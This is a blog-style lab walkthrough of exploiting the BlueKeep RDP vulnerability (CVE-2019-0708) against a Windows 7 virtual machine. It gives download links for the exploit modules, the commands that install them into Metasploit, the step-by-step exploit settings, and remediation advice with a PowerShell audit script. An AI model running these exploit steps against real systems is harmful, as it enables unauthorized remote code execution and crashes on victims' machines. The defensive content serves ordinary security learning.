Exploiting the BlueKeep RCE vulnerability (CVE-2019-0708)

Foreword

Last month an exploit for this high-risk vulnerability was released, so I am following the trend and reproducing it here... (¯▽¯)~*


Brief introduction

Windows has once again been hit by a highly destructive high-risk remote vulnerability, CVE-2019-0708. An attacker who successfully exploits it can execute arbitrary code on the target system, which includes obtaining sensitive information, remote code execution, denial of service and so on. More seriously, the vulnerability is triggered without any user interaction, so an attacker could build a worm comparable to WannaCry, which swept the world in 2017, that uses this vulnerability to spread and cause damage on a large scale.

Affected scope
Note: Windows 8, Windows 10 and later versions are not affected by this vulnerability.

Required conditions
The target has port 3389 open and the firewall turned off (or a firewall policy that allows port 3389 through).

Environment
Attacking machine (Kali) IP: 192.168.10.52
Target machine: Win7, IP 192.168.10.55 (3389 open, firewall turned off)
All virtual machines use bridged networking

1. Update msf
  Run on the command line:
  apt-get update
  apt-get install metasploit-framework
  I got some errors when updating here, but it can still be used.


2. Download the exp
  Baidu netdisk link: https://pan.baidu.com/s/1HTk3ehKvZYM0rh4tC0TQLg   extraction code: 4dy9

  After downloading, move the files into Kali and place them in the following locations:

  rdp.rb goes into the /usr/share/metasploit-framework/lib/msf/core/exploit directory

  rdp_scanner.rb and cve_2019_0708_bluekeep.rb go into the /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp directory

  cve_2019_0708_bluekeep_rce.rb goes into the /usr/share/metasploit-framework/modules/exploits/windows/rdp directory. Note that if the rdp directory does not exist, create it first.

  Commands (be sure to overwrite the original files; the rdp.rb destination below is the lib/msf/core/exploit path named above):
  cp rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb
  cp rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
  cp cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
  cp cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

3. Reload the msf modules
  First run msfconsole in Kali to enter Metasploit.
  Then run reload_all to load the scripts you copied over.
  Wait a moment and it is done.

4. Use the module
search 0708      the third result is the module we use
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce      select the module

This exp currently only supports Windows 7 / 2008 R2 (I am using Win7 Ultimate 64-bit here).
set RHOSTS      sets the target IP
set RPORT       sets the RDP port
set target ID   selects the victim machine type
exploit         starts the attack and waits for the connection to be established

So:
set RHOSTS 192.168.10.55      the victim machine

set RPORT 3389      the port (fixed)

show targets
Since my victim is a Win7 virtual machine, choose 3 here:
set target 3

Then run exploit or run to start the attack (the first attempt blue-screened the Win7 machine, the second succeeded).

Collected vulnerability detection tools
Baidu netdisk link: https://pan.baidu.com/s/1ylewLDQPwc4FuxCkm-aQlg    extraction code: ailu

Remediation:
  1. Apply the security patch for the corresponding system promptly.
  2. Close port 3389, or add a firewall policy that restricts access to port 3389.
  3. If you cannot patch, enable Network Level Authentication (NLA) for Remote Desktop; this temporarily blocks the attack.
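The following script is an added example, not part of the original post, that audits the three remediation points above on a Windows host from an elevated PowerShell session. It assumes the standard Terminal Server registry keys, the Windows 7 / 2008 R2 inbound firewall rule display name "Remote Desktop (TCP-In)", and a placeholder KB number, because the post does not name the patch; the 192.168.10.0/24 scope in the commented remediation line is taken from the lab network in the post.

```powershell
# Added example (not from the original post): audit BlueKeep mitigations on this host.
# Run in an elevated PowerShell session. Returns a list of findings; empty means all three
# mitigations (patch, restricted 3389 access, NLA) are in place.

function Test-BlueKeepMitigations {
    param(
        # Placeholder: fill in the KB for your OS from the Microsoft advisory for CVE-2019-0708
        [string]$RequiredKb = 'KB<patch-id-for-your-OS>',
        # Assumed rule name; correct for Windows 7 / 2008 R2 ("Remote Desktop - User Mode (TCP-In)" on newer versions)
        [string]$RdpRuleName = 'Remote Desktop (TCP-In)'
    )

    $tsKey  = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
    $tcpKey = "$tsKey\WinStations\RDP-Tcp"
    $findings = @()

    # 1. Patch: Get-HotFix lists installed updates by HotFixID
    $patched = Get-HotFix -ErrorAction SilentlyContinue | Where-Object { $_.HotFixID -eq $RequiredKb }
    if (-not $patched) { $findings += "Patch $RequiredKb is not installed" }

    # 2. Exposure of 3389: fDenyTSConnections = 0 means Remote Desktop is enabled and listening
    $denyTs = (Get-ItemProperty -Path $tsKey -Name fDenyTSConnections -ErrorAction SilentlyContinue).fDenyTSConnections
    if ($denyTs -eq 0) {
        $findings += 'Remote Desktop is enabled (port 3389 listening)'
        # Check the inbound rule's RemoteIP scope with netsh (available on Windows 7)
        $rule = netsh advfirewall firewall show rule name="$RdpRuleName" 2>$null
        if ($rule -match 'RemoteIP:\s+Any') {
            $findings += "Firewall rule '$RdpRuleName' allows any remote IP"
        }
    }

    # 3. NLA: UserAuthentication = 1 requires authentication before the RDP session is created,
    #    so the pre-auth channel abused by this vulnerability is not reachable anonymously
    $nla = (Get-ItemProperty -Path $tcpKey -Name UserAuthentication -ErrorAction SilentlyContinue).UserAuthentication
    if ($nla -ne 1) { $findings += 'Network Level Authentication (NLA) is not required' }

    return $findings
}

$results = Test-BlueKeepMitigations
if ($results.Count -eq 0) { 'No BlueKeep exposure findings' } else { $results }

# Remediation for points 2 and 3 (uncomment to apply; the subnet is the lab network from the post):
# Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -Name UserAuthentication -Value 1
# netsh advfirewall firewall set rule name="Remote Desktop (TCP-In)" new remoteip=192.168.10.0/24
```

NLA is the mitigation that matters most on an unpatched host: with UserAuthentication set to 1 the server demands credentials before it builds the session the exploit targets, which is why the post lists it as the stop-gap when the patch cannot be applied. The patch check only reports on the KB you pass in, so set that parameter per OS before trusting the first finding.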


Source: www.cnblogs.com/lceFIre/p/11628773.html